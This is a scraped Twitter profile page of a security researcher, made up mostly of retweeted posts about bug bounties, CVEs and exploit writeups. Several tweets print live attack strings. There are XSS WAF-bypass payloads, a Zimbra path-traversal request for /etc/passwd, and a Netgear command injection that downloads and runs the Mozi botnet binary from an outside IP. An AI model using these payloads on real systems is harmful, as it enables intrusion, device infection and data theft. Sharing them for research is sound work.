YongShao

@YongShao_feng

Security Researcher、1AQ Team@1aq.com、Speaker&Founder

Vrijeme pridruživanja: studeni 2015.

Tweetovi

Blokirali ste korisnika/cu @YongShao_feng

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @YongShao_feng

  1. proslijedio/la je Tweet
    31. sij

    Wow! "Resources for Beginner Bug Bounty Hunters" has over 1000 stars on GitHub now and we just pushed a new update! Check it out:

    Poništi
  2. proslijedio/la je Tweet
    4. sij
    Poništi
  3. proslijedio/la je Tweet
    16. sij

    New tool coming soon... Zipper, a CobaltStrike tool written in C which allows you to compress files and folders from local and UNC paths. Useful for RedTeams when large files/folders need to be exfiltrated.

    Poništi
  4. proslijedio/la je Tweet
    10. sij

    Citrix ADC/Netscaler RCE (CVE-2019-19781) 😬

    Poništi
  5. proslijedio/la je Tweet
    5. sij

    Observed a weird WAF bypass case: > WAF blocked <img> tag > 'src' attr got blocked too > Found WAF didn't block <image> Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` &lcub;&rcub;'> > BOOM

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    3. sij

    P1 on new year (zimbra LFI) []/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00

    Poništi
  7. proslijedio/la je Tweet
    2. sij

    Exploiting Wi-Fi stack on Tesla Model S. Details of vulnerabilities and exploition:

    Poništi
  8. proslijedio/la je Tweet
    1. sij

    Why not step into the next decade with WAF bypasses? Here are some gifts.😎 - Imperva <a69/onclick=write&lpar;&rpar;>pew - DotDefender <a69/onclick=[0].map(alert)>pew - Cloudbric <a69/onclick=[1].findIndex(alert)>pew Happy 0x32303230.😉

    Poništi
  9. proslijedio/la je Tweet
    30. pro 2019.

    This Kung Fu master is faster than gravity! WoW! 😎

    Poništi
  10. proslijedio/la je Tweet
    18. pro 2019.

    If you look into the right place, even Google can make some easy mistakes 👀👀 Check it out

    Poništi
  11. 24. pro 2019.

    世上本无圣诞老人🎅 所有的惊喜跟礼物🎁 都来源于爱你的我👨

    Poništi
  12. proslijedio/la je Tweet
    24. pro 2019.

    Writeup on how I made $40,000 breaking the new Chromium Edge using essentially two XSS flaws.

    Poništi
  13. proslijedio/la je Tweet
    21. pro 2019.

    New writeup, one of my favorite bugs 🤠 - Filling in the Blanks: Exploiting Null Byte Buffer Overflow for a $40,000 Bounty Featuring...

    Poništi
  14. proslijedio/la je Tweet
    10. pro 2019.

    AirDoS: Found a bug in iOS that lets you make nearby devices unusable through AirDrop:

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    10. pro 2019.

    Learn how found and exploited SockPuppet for iOS 12.4, featuring a bonus collaboration with LiveOverflow!

    Poništi
  16. proslijedio/la je Tweet
    10. pro 2019.

    An ancient Struts2 RCE vulnerability, CVE-2012-1592, the statement was updated by RedHat several days ago.

    Poništi
  17. proslijedio/la je Tweet
    8. pro 2019.

    A WAF bypass payload by <img src=something onauxclick="new Function `al\ert\`xss\``">

    Poništi
  18. proslijedio/la je Tweet
    7. pro 2019.

    Intresting.. /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://112.17.163.139:35681/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

    Poništi
  19. proslijedio/la je Tweet
    7. pro 2019.

    Tunneling traffic through MySQL service (or your mysqld is my new SOCKS5) by My old MySQL UDF PoCs are still hot 🔥

    Poništi
  20. proslijedio/la je Tweet
    8. pro 2019.

    GitHub - Symbo1/HackerOne-Staffs: 300+company -> 3k+Staffs

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·